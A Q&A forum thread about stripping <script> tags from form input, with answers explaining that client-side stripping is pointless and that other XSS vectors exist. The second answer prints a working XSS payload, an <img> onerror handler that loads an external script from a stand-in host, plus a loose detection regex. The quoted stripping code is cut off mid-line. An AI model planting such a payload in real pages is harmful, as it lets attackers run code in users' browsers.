How to create form to remove <script></script> tags and remove content or script between this tags?

Question

How to create form to remove <script></script> tags and remove content or script between between tags. please any one make a form for me (i already ask this question but not found any helpfull answer.)

like this form: (this form only remove <script></script> tags not remove script between <script>text</script> tags)

<script type="text/javascript">

// Strip HTML Tags (form) script- By JavaScriptKit.com (http://www.javascriptkit.com)
// For this and over 400+ free scripts, visit JavaScript Kit- http://www.javascriptkit.com/
// This notice must stay intact for use

function stripHTML(){
var re= /<\S[^><]*>/g
for (i=0; i<arguments.length; i++)
arguments[i].value=arguments[i].value.… "")
}

</script>

<form onSubmit="stripHTML(this.data1, this.data2)">

<textarea name="data1" style="width: 400px; height: 100px"></textarea>

<textarea name="data2" style="width: 400px; height: 100px"></textarea>

<input type="submit" value="submit">
</form>

Answer 1

It looks like you are trying to strip HTML from a textarea before submitting a form.

This is pointless because any validation and escaping will need to occur on your server. The only advantage I can think of by doing this if you have a history of very large chunks of code being submitted within script elements and trying to reduce a bit of the traffic.

You should submit the form as is (optionally validate it on the client) and then don't strip tags from it . Instead, keep it as is and choose the escaping method based on context. For example, if you are treating this text as text, and need to display it back to the end user, use echo htmlspecialchars($_POST['data1']); .

Answer 2

Keep in mind there are other ways of injecting JavaScript into the page – you'll have to do more than nullify <script> tags.

For instance, you can include Javascript as a DOM attribute – and it will be executed.

<img src="ლ(ಠ益ಠლ)" onerror="var b=document.createElement('script');b.setAttribute('src','http://www.example.com/script.js');var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(b,s);"/>

That <img> tag has a bogus URL, so it will cause an error, triggering its onerror handler. In this case, I've set it to load an external JS file.

You'll have to do some additional processing if you REALLY want to prevent arbitrary Javascript from being executed.

The following (super sloppy) regex will match any HTML tag that contains an onerror attribute, but YMMV. In this form, it would also match things like: <div class="onerror"> , and you don't want to remove things that are potentially harmless.

(<)(.*?)(onerror)(.*?)(>)